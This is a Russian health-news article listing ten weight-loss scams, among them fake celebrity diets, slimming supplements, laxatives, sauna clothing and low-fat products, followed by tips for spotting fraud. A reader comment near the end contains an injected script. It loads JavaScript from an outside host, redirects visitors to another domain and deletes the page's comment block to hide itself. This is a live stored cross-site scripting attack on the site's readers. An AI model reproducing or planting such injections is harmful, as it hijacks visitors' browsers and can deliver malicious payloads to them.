Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  10 мошенничеств в области...  >>  10 мошенничеств в области похудения
 
Обратная связь
 

10 мошенничеств в области похудения

Размер шрифта
04 августа 2011 07:00
  • google_analytics: false
  • Нравится

К 2014 году глобальный рынок средств похудения достигнет 586,3 млрд долларов. Это составляет больше трети ВВП России. Солидная часть этих средств – откровенное надувательство. На чем жулики делают деньги?

Александр Тушкин / «Здоровье инфо»

  1. «Диета Елены Малышевой»

    «Я заполнила анкету на сайте с конструктором персональных диет от Елены Малышевой. Отправила свой номер телефона, чтобы подтвердить, что я не робот. С меня сняли 300 рублей, а взамен прислали какую-то чушь!» – к сожалению, такие истории поступают в редакцию «Здоровье инфо» чуть ли не каждый день. Заявляем со всей ответственностью: не существует никакой «диеты Малышевой»! Мошенники решиливоспользоваться именем известной телеведущей, чтобы обманывать доверчивых потребителей. По тому же принципу организован лохотрон «диета Ксении Бородиной».

  2. Биологически активные добавки для похудения (БАД)

    БАДы для похудения («жиросжигатели», «блокаторы аппетита») просто не работают. Это было научно доказано на 11-ом Международном конгрессе по проблемам ожирения (International Congress on Obesity). Производство добавок в России и на Западе регулируется государством в области пищевых продуктов, а не лекарственных, что позволяет не проводить клинических испытаний. Поэтому мошенники могут рекламировать откровенную чушь: «быстрое похудение», «натуральные ингредиенты», «минус 10 кило за месяц». В лучшем случае вы потеряете деньги, в худшем – здоровье и жизнь.

  3. «Альтернативные практики»

    Сюда следует отнести все, что не входит в рамки доказательной медицины. Это методы альтернативной медицины – травы, иглоукалывание, пиявки и гомеопатия, экспериментальные – озонотерапия, и откровенное шарлатанство – пирсинг для похудения, пластыри на язык, народные целители и экстрасенсы. Ну что тут сказать – как можно платить за то, что не имеет научного обоснования? Тем более, когда речь идет о такой тонкой сфере, как похудение.

  4. Диеты в Интернете

    «Сбросить вес легко-быстро-эффективно с нашей диетой! Худеют все!» – под такой вывеской жулики работают в Интернете. Сайты публикуют эти диеты, а потом получают прибыль за счет размещения рекламы. Обычно эти рекомендации «врачей» основаны на потреблении одного суперпродукта (сельдерея, квашеной капусты, кефира). Однако ни один продукт не обладает жиросжигающими свойствами и не может обеспечить организм всеми необходимыми веществами.

  5. Слабительное и клизмы

    Миф о шлаках, которые нужно вымыть из кишечника, чтобы похудеть, устойчиво внушается «народными целителями» не только в России, но и на Западе. На днях ученые установили, что использование клизм и слабительных средств вообще не приносит никакой пользы. При этом они вызывают серьезные хронические осложнения, а в худшем случае – смерть.

1

  1. Кофе и чай для похудения

    Пока ученые спорят насчет эффективности натурального кофе и чая для похудения, юристы выносят однозначный приговор «кофе-слимам» и «травяным чаям»: не работает. Против производителей специального кофе для похудения, который даже кофейных зерен не содержит, в США возбуждено несколько десятков уголовных дел. А жиросжигающий чай, который с настоящим чаем ничего общего не имеет, даже способен стать причиной инфаркта.

  2. Тренажеры для мышц пресса

    «Как, и это тоже обман?!» – воскликните вы, – Но ведь вы сами пишете, что нужно заниматься физическими упражнениями, чтобы похудеть!» Верно, но напряжение мышц живота – худшее упражнение для похудения, так как невозможно сжигать жир в одном месте. На мифе о точечной редукции жира производители спортивного оборудования будут зарабатывать до тех пор, пока жива человеческая глупость. Скручивания на тренажерах ведут к ничтожным потерям веса по сравнению с классическими тренировками.

  3. Специальная одежда для похудения

    Шорты для похудения с эффектом сауны, термопояса, штаны, спортивные костюмы – на что только не способна выдумка волшебников от мира здоровья! И ведь люди покупают же. А потом сажают себе сердце и жалуются на жизнь. Ну не дешевле ли ходить в шубе круглый год?

  4. Обезжиренные продукты

    Индустрия обезжиренных продуктов занимает большую часть товаров для похудения. Тут и «диетические» печенья, «легкие» пирожные, молочные продукты с низким содержанием жира. Однако они совсем не помогают похудеть! В таких продуктах недостаток жира обычно замещается сахаром. Особенно это актуально для России, где производители не обязаны указывать содержание сахаров в продуктах. Ну а в ресторанах «обезжиренные» блюда могут содержать на 100 ккал больше, чем было указана в меню!

  5. Откровенная чушь

    Очки со специальными линзами, которые угнетают аппетит. Зашивание рта. Глотание глистов. Употребление наркотиков. Тренажеры, имитирующие езду на лошади. Миостимуляторы. Вибрирующие платформы. Похудение по лунным циклам. Поедание земли. Вдыхание ароматов еды для подавления аппетита. Приемы пищи без одежды. Такому полету фантазии позавидовал бы любой творческий человек! Впрочем, обман – тоже искусство.

Как распознать обман

Соберите всю возможную информацию о товаре перед его покупкой. Сверьтесь со списком мошенников FDA и опасных товаров. Не покупайте продукт или прибор, если в его описании встречается:

  • Приставка «фен». Обычно речь идет о фентермине, который является наркотиком
  • Использование слов-маркеров: «легко, быстро, эффективно, за неделю, за месяц, без упражнений, без диет, помогает от целлюлита»
  • Мгновенное похудение. Это просто невозможно, если это не ампутация
  • Отзывы потребителей. Нетрудно догадаться, что они фальшивые
  • Рекомендации «врачей». Если человек в белом халате, это еще не означает, что он – врач.
     

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как уменьшить жир на лице?   6 вещей, которые нельзя делать для похудения   Быстрое похудение   Кроссовки от аборигенов помогут похудеть?  
05 августа 2011Худеющие и похудевшие думают по-разному 28 мая 2013Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых
 
15 августа 2012Обнаружены механизмы, контролирующие ожирение и атеросклероз! 15 февраля 2012Похудение может быть заразным
 

Слайдшоу

1
Как нас обманывают! Продукты-обманщики!
10 вещей, которые поймут только те, кто хочет похудеть
От этой еды будет понос!

Тесты

1
Жиры, которые мы едим
Знаете ли вы, как работает ваш желудок?
Есть ли у вас избыточный вес?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.